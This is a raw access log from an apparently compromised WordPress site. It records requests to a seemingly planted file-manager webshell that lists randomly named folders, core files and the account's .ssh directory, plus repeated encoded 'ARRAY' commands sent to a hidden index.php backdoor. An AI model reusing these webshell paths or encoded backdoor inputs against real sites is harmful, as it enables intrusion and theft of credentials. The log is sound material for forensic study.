51.68.32.135 - - [15/Oct/2025:16:32:49 -0400] "GET /?fileloc=/var/www/vhosts/academiedumarketing.com/public_html/AvEhfIyetYTWjiR/bqwpmBefxinU.m4a&path=/var/www/vhosts/academiedumarketing.com/public_html/AvEhfIyetYTWjiR HTTP/1.0" 200 8866 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.68.32.135 - - [15/Oct/2025:16:32:51 -0400] "GET /?fileloc=/var/www/vhosts/academiedumarketing.com/public_html/AvEhfIyetYTWjiR/cache.php&path=/var/www/vhosts/academiedumarketing.com/public_html/AvEhfIyetYTWjiR HTTP/1.0" 200 11303 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.68.32.135 - - [15/Oct/2025:16:32:53 -0400] "GET /?fileloc=/var/www/vhosts/academiedumarketing.com/public_html/AvEhfIyetYTWjiR/index.php&path=/var/www/vhosts/academiedumarketing.com/public_html/AvEhfIyetYTWjiR HTTP/1.0" 200 7786 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.68.32.135 - - [15/Oct/2025:16:32:55 -0400] "GET /?fileloc=/var/www/vhosts/academiedumarketing.com/public_html/IwMWUFYpGl/.htaccess&path=/var/www/vhosts/academiedumarketing.com/public_html/IwMWUFYpGl HTTP/1.0" 200 6696 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.68.32.135 - - [15/Oct/2025:16:32:57 -0400] "GET /?fileloc=/var/www/vhosts/academiedumarketing.com/public_html/IwMWUFYpGl/cache.php&path=/var/www/vhosts/academiedumarketing.com/public_html/IwMWUFYpGl HTTP/1.0" 200 11297 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.68.32.135 - - [15/Oct/2025:16:32:59 -0400] "GET /?fileloc=/var/www/vhosts/academiedumarketing.com/public_html/IwMWUFYpGl/index.php&path=/var/www/vhosts/academiedumarketing.com/public_html/IwMWUFYpGl HTTP/1.0" 200 9115 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.68.32.135 - - [15/Oct/2025:16:33:01 -0400] "GET /?fileloc=/var/www/vhosts/academiedumarketing.com/public_html/RYHFajgJGk/.htaccess&path=/var/www/vhosts/academiedumarketing.com/public_html/RYHFajgJGk HTTP/1.0" 200 6696 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.68.32.135 - - [15/Oct/2025:16:33:03 -0400] "GET /?fileloc=/var/www/vhosts/academiedumarketing.com/public_html/RYHFajgJGk/cache.php&path=/var/www/vhosts/academiedumarketing.com/public_html/RYHFajgJGk HTTP/1.0" 200 11294 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.68.32.135 - - [15/Oct/2025:16:33:05 -0400] "GET /?fileloc=/var/www/vhosts/academiedumarketing.com/public_html/RYHFajgJGk/index.php&path=/var/www/vhosts/academiedumarketing.com/public_html/RYHFajgJGk HTTP/1.0" 200 6748 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
142.4.205.1 - - [15/Oct/2025:16:32:07 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303536333932372p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303536303332372q3462323838373635313137666137636134636665356164393665636439306235222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
51.68.32.135 - - [15/Oct/2025:16:33:06 -0400] "GET /?fileloc=/var/www/vhosts/academiedumarketing.com/public_html/RYHFajgJGk/m.wav&path=/var/www/vhosts/academiedumarketing.com/public_html/RYHFajgJGk HTTP/1.0" 200 8984 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.68.32.135 - - [15/Oct/2025:16:33:08 -0400] "GET /?fileloc=/var/www/vhosts/academiedumarketing.com/public_html/aAqlKLnxmZitXs/.htaccess&path=/var/www/vhosts/academiedumarketing.com/public_html/aAqlKLnxmZitXs HTTP/1.0" 200 6698 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.68.32.135 - - [15/Oct/2025:16:33:10 -0400] "GET /?fileloc=/var/www/vhosts/academiedumarketing.com/public_html/aAqlKLnxmZitXs/cache.php&path=/var/www/vhosts/academiedumarketing.com/public_html/aAqlKLnxmZitXs HTTP/1.0" 200 11296 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.68.32.135 - - [15/Oct/2025:16:33:12 -0400] "GET /?fileloc=/var/www/vhosts/academiedumarketing.com/public_html/aAqlKLnxmZitXs/index.php&path=/var/www/vhosts/academiedumarketing.com/public_html/aAqlKLnxmZitXs HTTP/1.0" 200 7825 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.68.32.135 - - [15/Oct/2025:16:33:14 -0400] "GET /?fileloc=/var/www/vhosts/academiedumarketing.com/public_html/aAqlKLnxmZitXs/tYQKLpsUhSqlTWjeauc.gif&path=/var/www/vhosts/academiedumarketing.com/public_html/aAqlKLnxmZitXs HTTP/1.0" 200 8906 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.68.32.135 - - [15/Oct/2025:16:33:16 -0400] "GET /?fileloc=/var/www/vhosts/academiedumarketing.com/public_html/brYIQEH/.htaccess&path=/var/www/vhosts/academiedumarketing.com/public_html/brYIQEH HTTP/1.0" 200 6692 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
57.141.4.63 - - [15/Oct/2025:16:33:16 -0400] "GET /market/2274629104.htm?path=/var/www/vhosts/academiedumarketing.com/public_html/images HTTP/1.0" 200 20180 "-" "meta-externalagent/1.1 (+https://developers.facebook.com/docs/sharing/webmasters/crawler)"
51.68.32.135 - - [15/Oct/2025:16:33:18 -0400] "GET /?fileloc=/var/www/vhosts/academiedumarketing.com/public_html/brYIQEH/cache.php&path=/var/www/vhosts/academiedumarketing.com/public_html/brYIQEH HTTP/1.0" 200 6936 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.68.32.135 - - [15/Oct/2025:16:33:19 -0400] "GET /?fileloc=/var/www/vhosts/academiedumarketing.com/public_html/brYIQEH/index.php&path=/var/www/vhosts/academiedumarketing.com/public_html/brYIQEH HTTP/1.0" 200 6932 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.68.32.135 - - [15/Oct/2025:16:33:21 -0400] "GET /?fileloc=/var/www/vhosts/academiedumarketing.com/public_html/brYIQEH/swf_68e4b8cdc5c08.zip&path=/var/www/vhosts/academiedumarketing.com/public_html/brYIQEH HTTP/1.0" 200 6705 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
114.119.145.188 - - [15/Oct/2025:16:33:22 -0400] "GET /2025/10/11/how-to-play-togel-online-like-a-pro/?path=/var/www/vhosts/academiedumarketing.com/public_html/wp-content/plugins HTTP/1.0" 200 7184 "https://academiedumarketing.com/2025/10/11/how-to-play-togel-online-like-a-pro/?path=/var/www/vhosts/academiedumarketing.com/public_html/wp-content" "Mozilla/5.0 (Linux; Android 7.0;) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; PetalBot;+https://webmaster.petalsearch.com/site/petalbot)"
51.68.32.135 - - [15/Oct/2025:16:33:23 -0400] "GET /?fileloc=/var/www/vhosts/academiedumarketing.com/public_html/images/.htaccess&path=/var/www/vhosts/academiedumarketing.com/public_html/images HTTP/1.0" 200 6688 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.68.32.135 - - [15/Oct/2025:16:33:25 -0400] "GET /?fileloc=/var/www/vhosts/academiedumarketing.com/public_html/images/toggige-arrow.jpg&path=/var/www/vhosts/academiedumarketing.com/public_html/images HTTP/1.0" 200 21775 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
142.4.205.1 - - [15/Oct/2025:16:32:27 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303536333934372p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303536303334372q3964313834393933653332643335643735663336356161363932646163336561222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
51.68.32.135 - - [15/Oct/2025:16:33:27 -0400] "GET /?fileloc=/var/www/vhosts/academiedumarketing.com/public_html/jGVNHJwRnIpsga/.htaccess&path=/var/www/vhosts/academiedumarketing.com/public_html/jGVNHJwRnIpsga HTTP/1.0" 200 6701 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.68.32.135 - - [15/Oct/2025:16:33:29 -0400] "GET /?fileloc=/var/www/vhosts/academiedumarketing.com/public_html/jGVNHJwRnIpsga/cache.php&path=/var/www/vhosts/academiedumarketing.com/public_html/jGVNHJwRnIpsga HTTP/1.0" 200 6944 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.68.32.135 - - [15/Oct/2025:16:33:30 -0400] "GET /?fileloc=/var/www/vhosts/academiedumarketing.com/public_html/jGVNHJwRnIpsga/index.php&path=/var/www/vhosts/academiedumarketing.com/public_html/jGVNHJwRnIpsga HTTP/1.0" 200 6937 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.68.32.135 - - [15/Oct/2025:16:33:32 -0400] "GET /?fileloc=/var/www/vhosts/academiedumarketing.com/public_html/jGVNHJwRnIpsga/mov_68e4b97e89a6d.zip&path=/var/www/vhosts/academiedumarketing.com/public_html/jGVNHJwRnIpsga HTTP/1.0" 200 6713 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.68.32.135 - - [15/Oct/2025:16:33:34 -0400] "GET /?fileloc=/var/www/vhosts/academiedumarketing.com/public_html/njABawTk/.htaccess&path=/var/www/vhosts/academiedumarketing.com/public_html/njABawTk HTTP/1.0" 200 6692 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.68.32.135 - - [15/Oct/2025:16:33:36 -0400] "GET /?fileloc=/var/www/vhosts/academiedumarketing.com/public_html/njABawTk/cache.php&path=/var/www/vhosts/academiedumarketing.com/public_html/njABawTk HTTP/1.0" 200 11302 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.68.32.135 - - [15/Oct/2025:16:33:38 -0400] "GET /?fileloc=/var/www/vhosts/academiedumarketing.com/public_html/njABawTk/ftWnFc.3gp&path=/var/www/vhosts/academiedumarketing.com/public_html/njABawTk HTTP/1.0" 200 9085 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.68.32.135 - - [15/Oct/2025:16:33:40 -0400] "GET /?fileloc=/var/www/vhosts/academiedumarketing.com/public_html/njABawTk/index.php&path=/var/www/vhosts/academiedumarketing.com/public_html/njABawTk HTTP/1.0" 200 6749 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.68.32.135 - - [15/Oct/2025:16:33:42 -0400] "GET /?fileloc=/var/www/vhosts/academiedumarketing.com/public_html/wp-content/.htaccess&path=/var/www/vhosts/academiedumarketing.com/public_html/wp-content HTTP/1.0" 200 6690 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.68.32.135 - - [15/Oct/2025:16:33:44 -0400] "GET /?fileloc=/var/www/vhosts/academiedumarketing.com/public_html/wp-content/admin.php&path=/var/www/vhosts/academiedumarketing.com/public_html/wp-content HTTP/1.0" 200 32598 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.68.32.135 - - [15/Oct/2025:16:33:46 -0400] "GET /?fileloc=/var/www/vhosts/academiedumarketing.com/public_html/wp-content/maintenance.php&path=/var/www/vhosts/academiedumarketing.com/public_html/wp-content HTTP/1.0" 200 7637 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
142.4.205.1 - - [15/Oct/2025:16:32:47 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303536333936372p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303536303336372q6662666663623763356532393262316633306265326266666139393334383835222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
51.68.32.135 - - [15/Oct/2025:16:33:48 -0400] "GET /?fileloc=/var/www/vhosts/academiedumarketing.com/public_html/wp-content/test1.php&path=/var/www/vhosts/academiedumarketing.com/public_html/wp-content HTTP/1.0" 200 14818 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.68.32.135 - - [15/Oct/2025:16:33:50 -0400] "GET /?fileloc=/var/www/vhosts/academiedumarketing.com/public_html/wp-includes/ms-files.php&path=/var/www/vhosts/academiedumarketing.com/public_html/wp-includes HTTP/1.0" 200 7834 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.68.32.135 - - [15/Oct/2025:16:33:51 -0400] "GET /?fileloc=/var/www/vhosts/academiedumarketing.com/public_html/wp-includes/ms-functions.php&path=/var/www/vhosts/academiedumarketing.com/public_html/wp-includes HTTP/1.0" 200 26553 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.68.32.135 - - [15/Oct/2025:16:33:53 -0400] "GET /?fileloc=/var/www/vhosts/academiedumarketing.com/public_html/wp-includes/ms-load.php&path=/var/www/vhosts/academiedumarketing.com/public_html/wp-includes HTTP/1.0" 200 12904 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.68.32.135 - - [15/Oct/2025:16:33:55 -0400] "GET /?fileloc=/var/www/vhosts/academiedumarketing.com/public_html/wp-includes/nav-menu.php&path=/var/www/vhosts/academiedumarketing.com/public_html/wp-includes HTTP/1.0" 200 16523 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.68.32.135 - - [15/Oct/2025:16:33:57 -0400] "GET /?fileloc=/var/www/vhosts/academiedumarketing.com/public_html/wp-includes/option.php&path=/var/www/vhosts/academiedumarketing.com/public_html/wp-includes HTTP/1.0" 200 25665 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.68.32.135 - - [15/Oct/2025:16:33:59 -0400] "GET /?fileloc=/var/www/vhosts/academiedumarketing.com/public_html/wp-includes/pluggable-deprecated.php&path=/var/www/vhosts/academiedumarketing.com/public_html/wp-includes HTTP/1.0" 200 8590 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.68.32.135 - - [15/Oct/2025:16:34:01 -0400] "GET /?fileloc=/var/www/vhosts/academiedumarketing.com/public_html/wp-includes/pluggable.php&path=/var/www/vhosts/academiedumarketing.com/public_html/wp-includes HTTP/1.0" 200 34575 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.68.32.135 - - [15/Oct/2025:16:34:03 -0400] "GET /?fileloc=/var/www/vhosts/academiedumarketing.com/public_html/wp-includes/post-formats.php&path=/var/www/vhosts/academiedumarketing.com/public_html/wp-includes HTTP/1.0" 200 8575 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.68.32.135 - - [15/Oct/2025:16:34:05 -0400] "GET /?fileloc=/var/www/vhosts/academiedumarketing.com/public_html/wp-includes/post-template.php&path=/var/www/vhosts/academiedumarketing.com/public_html/wp-includes HTTP/1.0" 200 23200 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
142.4.205.1 - - [15/Oct/2025:16:33:07 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303536333938372p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303536303338372q3737383639323634346562613738336463636562316338373164663966323566222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
51.68.32.135 - - [15/Oct/2025:16:34:07 -0400] "GET /?fileloc=/var/www/vhosts/academiedumarketing.com/public_html/wp-includes/post-thumbnail-template.php&path=/var/www/vhosts/academiedumarketing.com/public_html/wp-includes HTTP/1.0" 200 9016 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.68.32.135 - - [15/Oct/2025:16:34:09 -0400] "GET /?fileloc=/var/www/vhosts/academiedumarketing.com/public_html/wp-includes/query.php&path=/var/www/vhosts/academiedumarketing.com/public_html/wp-includes HTTP/1.0" 200 11772 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.68.32.135 - - [15/Oct/2025:16:34:11 -0400] "GET /?fileloc=/var/www/vhosts/academiedumarketing.com/public_html/wp-includes/registration-functions.php&path=/var/www/vhosts/academiedumarketing.com/public_html/wp-includes HTTP/1.0" 200 6829 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.68.32.135 - - [15/Oct/2025:16:34:13 -0400] "GET /?fileloc=/var/www/vhosts/academiedumarketing.com/public_html/wp-includes/registration.php&path=/var/www/vhosts/academiedumarketing.com/public_html/wp-includes HTTP/1.0" 200 6823 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.68.32.135 - - [15/Oct/2025:16:34:15 -0400] "GET /?fileloc=/var/www/vhosts/academiedumarketing.com/public_html/wp-includes/rest-api.php&path=/var/www/vhosts/academiedumarketing.com/public_html/wp-includes HTTP/1.0" 200 28024 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.68.32.135 - - [15/Oct/2025:16:34:17 -0400] "GET /?fileloc=/var/www/vhosts/academiedumarketing.com/public_html/wp-includes/revision.php&path=/var/www/vhosts/academiedumarketing.com/public_html/wp-includes HTTP/1.0" 200 14577 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.68.32.135 - - [15/Oct/2025:16:34:18 -0400] "GET /?fileloc=/var/www/vhosts/academiedumarketing.com/public_html/wp-includes/rewrite.php&path=/var/www/vhosts/academiedumarketing.com/public_html/wp-includes HTTP/1.0" 200 12609 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.68.32.135 - - [15/Oct/2025:16:34:20 -0400] "GET /?path=/var/www/vhosts/academiedumarketing.com/.analytic HTTP/1.0" 200 7006 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.68.32.135 - - [15/Oct/2025:16:34:22 -0400] "GET /?path=/var/www/vhosts/academiedumarketing.com/.composer HTTP/1.0" 200 7119 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.68.32.135 - - [15/Oct/2025:16:34:24 -0400] "GET /?path=/var/www/vhosts/academiedumarketing.com/.ssh HTTP/1.0" 200 7000 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.68.32.135 - - [15/Oct/2025:16:34:26 -0400] "GET /?path=/var/www/vhosts/academiedumarketing.com/.wp-cli HTTP/1.0" 200 6977 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
142.4.205.1 - - [15/Oct/2025:16:33:27 -0400] "GET /wp-admin/css/css/css/css/index.php?ARRAY=7o2230223n313736303536343030372p2231223n22687474703n5p2s5p2s7n7335393976313373752r636s7570706p652r6366645p2s3s6p633q7068705s636s64655s6n6326743q313736303536303430372q3362376534396635643464323336346464336532663431366531303164646565222p2232223n226663656363663335616434616263353265323261666238643637303038386230222p2233223n223731646463356237356163613834316238313530363431333838396238346630222p226175746s5s66696p655s6r616q65223n6r756p6p2p226175746s5s70617373223n6r756p6p2p2262696r675s70617373223n2231312q33342q35372q36372q37312q38352q3139227q HTTP/1.0" 504 4358 "-" "-"
51.68.32.135 - - [15/Oct/2025:16:34:28 -0400] "GET /?path=/var/www/vhosts/academiedumarketing.com/bin HTTP/1.0" 200 6717 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.68.32.135 - - [15/Oct/2025:16:34:30 -0400] "GET /?path=/var/www/vhosts/academiedumarketing.com/error_docs HTTP/1.0" 200 7720 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.68.32.135 - - [15/Oct/2025:16:34:32 -0400] "GET /?path=/var/www/vhosts/academiedumarketing.com/httpdocs HTTP/1.0" 200 6720 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.68.32.135 - - [15/Oct/2025:16:34:34 -0400] "GET /?path=/var/www/vhosts/academiedumarketing.com/logs HTTP/1.0" 200 8403 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.68.32.135 - - [15/Oct/2025:16:34:36 -0400] "GET /?path=/var/www/vhosts/academiedumarketing.com/perl5 HTTP/1.0" 200 6719 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.68.32.135 - - [15/Oct/2025:16:34:37 -0400] "GET /?path=/var/www/vhosts/academiedumarketing.com/php HTTP/1.0" 200 7273 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.68.32.135 - - [15/Oct/2025:16:34:39 -0400] "GET /?path=/var/www/vhosts/academiedumarketing.com/public_html/AvEhfIyetYTWjiR/AvEhfIyetYTWjiR HTTP/1.0" 200 7209 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.68.32.135 - - [15/Oct/2025:16:34:41 -0400] "GET /?path=/var/www/vhosts/academiedumarketing.com/public_html/IwMWUFYpGl/IwMWUFYpGl HTTP/1.0" 200 7196 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.68.32.135 - - [15/Oct/2025:16:34:43 -0400] "GET /?path=/var/www/vhosts/academiedumarketing.com/public_html/RYHFajgJGk/RYHFajgJGk HTTP/1.0" 200 7200 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
51.68.32.135 - - [15/Oct/2025:16:34:45 -0400] "GET /?path=/var/www/vhosts/academiedumarketing.com/public_html/aAqlKLnxmZitXs/aAqlKLnxmZitXs HTTP/1.0" 200 7205 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
